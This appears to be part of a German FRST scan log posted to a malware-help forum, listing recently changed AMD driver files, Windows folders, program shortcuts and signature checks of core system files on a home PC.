2017-05-16 18:06 - 2017-04-14 21:32 - 00551808 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00483712 _____ C:\WINDOWS\system32\atieah64.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00467328 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00411008 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00334208 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00245112 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00203648 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00156704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00148440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00122744 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00115072 _____ C:\WINDOWS\system32\atidxx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00101760 _____ C:\WINDOWS\SysWOW64\atidxx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00068992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 10320248 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 08479104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02536320 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amfrt64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02198400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amfrt32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00112512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00099192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00864120 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00696192 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00514424 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00360312 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00091520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmcl64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00075136 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmcl32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00573800 _____ C:\WINDOWS\system32\amdmiracast.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00196176 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00164400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00139080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00116072 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2017-05-12 20:28 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-05-10 21:47 - 2015-08-16 13:45 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-05-09 21:42 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-05-09 21:32 - 2015-04-25 06:35 - 00000000 ____D C:\Users\Dino\AppData\Local\Packages
2017-05-08 21:19 - 2015-04-25 07:09 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-08 21:13 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat
2017-05-07 21:26 - 2015-08-16 13:47 - 00002419 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-05-07 21:24 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-05-07 18:12 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-05-07 18:11 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning
2017-05-07 18:11 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI
2017-05-07 18:09 - 2017-03-18 22:56 - 00465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2017-05-07 17:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration
2017-05-07 17:18 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-05-07 17:17 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate
2017-05-07 17:17 - 2015-08-16 13:44 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-05-07 17:16 - 2017-03-29 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular
2017-05-07 17:16 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-05-07 17:16 - 2017-02-19 12:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2017
2017-05-07 17:16 - 2017-02-05 21:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
2017-05-07 17:16 - 2017-01-22 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SHARKOON Drakonia
2017-05-07 17:16 - 2016-02-13 13:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2016
2017-05-07 17:16 - 2015-08-22 17:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™
2017-05-07 17:16 - 2015-08-22 14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2017-05-07 17:16 - 2015-05-24 14:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker
2017-05-07 17:16 - 2015-05-24 12:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\WINDOWS\system32\STRING
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG5600 series Benutzerregistrierung
2017-05-07 17:16 - 2015-04-26 15:12 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-26 14:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-05-07 17:16 - 2015-04-26 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2017-05-07 17:16 - 2015-04-26 13:55 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader
2017-05-07 17:16 - 2015-04-26 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarCraft II
2017-05-07 17:16 - 2015-04-26 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2017-05-07 17:16 - 2015-04-25 17:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-25 07:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo
2017-05-07 17:16 - 2015-04-25 07:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician
2017-05-07 17:16 - 2015-04-25 07:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\InputMethod
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\InputMethod
2017-05-07 17:14 - 2017-01-29 17:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys
2017-05-07 17:14 - 2017-01-22 15:26 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc
2017-05-07 17:14 - 2016-11-30 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24
2017-05-07 17:14 - 2016-11-30 18:10 - 00000000 ____D C:\WINDOWS\system32\ÿÿÿÿÿÿÿÿ8
2017-05-07 17:14 - 2016-05-01 13:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan 1.0.3.1
2017-05-07 17:14 - 2015-08-31 18:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2017-05-07 17:14 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2017-05-07 17:14 - 2015-04-26 14:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive
2017-05-07 17:14 - 2015-04-25 17:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-05-07 17:14 - 2015-04-25 07:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek
2017-05-07 17:14 - 2015-04-25 07:16 - 00000000 ____D C:\Program Files\Intel
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Shared
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared
2017-05-07 17:13 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-05-01 12:45 - 2015-04-25 07:04 - 00000000 ____D C:\ProgramData\AMD
2017-05-01 12:44 - 2016-05-01 13:18 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-05-01 12:17 - 2016-09-30 17:45 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-01 10:53 - 2015-04-25 17:43 - 00000000 ____D C:\Users\Dino\AppData\Local\Steam
2017-04-29 03:05 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-04-29 03:05 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\system32\atiapfxx.blb
2017-04-25 00:56 - 2017-04-14 01:44 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2017-04-25 00:51 - 2017-04-14 01:44 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2015-04-25 17:18 - 2017-01-27 23:52 - 0007601 _____ () C:\Users\Dino\AppData\Local\Resmon.ResmonCfg
2017-02-05 19:40 - 2017-02-05 19:40 - 0046145 _____ () C:\ProgramData\agent.1486316443.bdinstall.bin
2017-02-05 20:08 - 2017-02-05 20:08 - 0026583 _____ () C:\ProgramData\agent.1486318128.bdinstall.bin
2017-02-05 20:09 - 2017-02-05 20:09 - 0026510 _____ () C:\ProgramData\agent.1486318150.bdinstall.bin
2017-02-05 20:52 - 2017-02-05 20:52 - 0046366 _____ () C:\ProgramData\agent.1486320772.bdinstall.bin
2017-02-05 20:55 - 2017-02-05 20:55 - 0028837 _____ () C:\ProgramData\agent.1486320909.bdinstall.bin
2017-02-05 20:57 - 2017-02-05 20:57 - 0046212 _____ () C:\ProgramData\agent.1486321078.bdinstall.bin
2017-02-05 21:01 - 2017-02-05 21:01 - 0026790 _____ () C:\ProgramData\agent.1486321314.bdinstall.bin
2017-02-05 21:02 - 2017-02-05 21:02 - 0028833 _____ () C:\ProgramData\agent.1486321377.bdinstall.bin
2017-02-05 21:11 - 2017-02-05 21:11 - 0046370 _____ () C:\ProgramData\agent.1486321901.bdinstall.bin
2017-02-09 19:09 - 2017-02-09 19:09 - 0028754 _____ () C:\ProgramData\agent.1486660167.bdinstall.bin
2017-03-08 21:56 - 2017-03-08 21:56 - 0029970 _____ () C:\ProgramData\agent.update.1489002971.bdinstall.bin
2017-02-05 21:15 - 2017-02-05 21:15 - 0381546 _____ () C:\ProgramData\cl.1486322005.bdinstall.bin
2017-02-05 21:17 - 2017-02-05 21:17 - 0055877 _____ () C:\ProgramData\dm.1486322271.bdinstall.bin
2017-02-07 23:33 - 2017-02-07 23:33 - 0035238 _____ () C:\ProgramData\dm.1486503192.bdinstall.bin
2017-05-07 17:13 - 2017-05-07 17:13 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
==================== Bamital & volsnap ======================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2017-05-19 15:19
==================== Ende von FRST.txt ============================
|
|
| Themen zu Trojaner, Adware oder sonstiges ? |
| adware, browser, canon, computer, firefox, flash player, homepage, installation, internet, mozilla, object, pop ups, problem, prozesse, realtek, registry, revo uninstaller, scan, software, svchost.exe, system, teamspeak, trojaner, trojaner board, usb, windows, windowsapps, wiso |
Linear-Darstellung
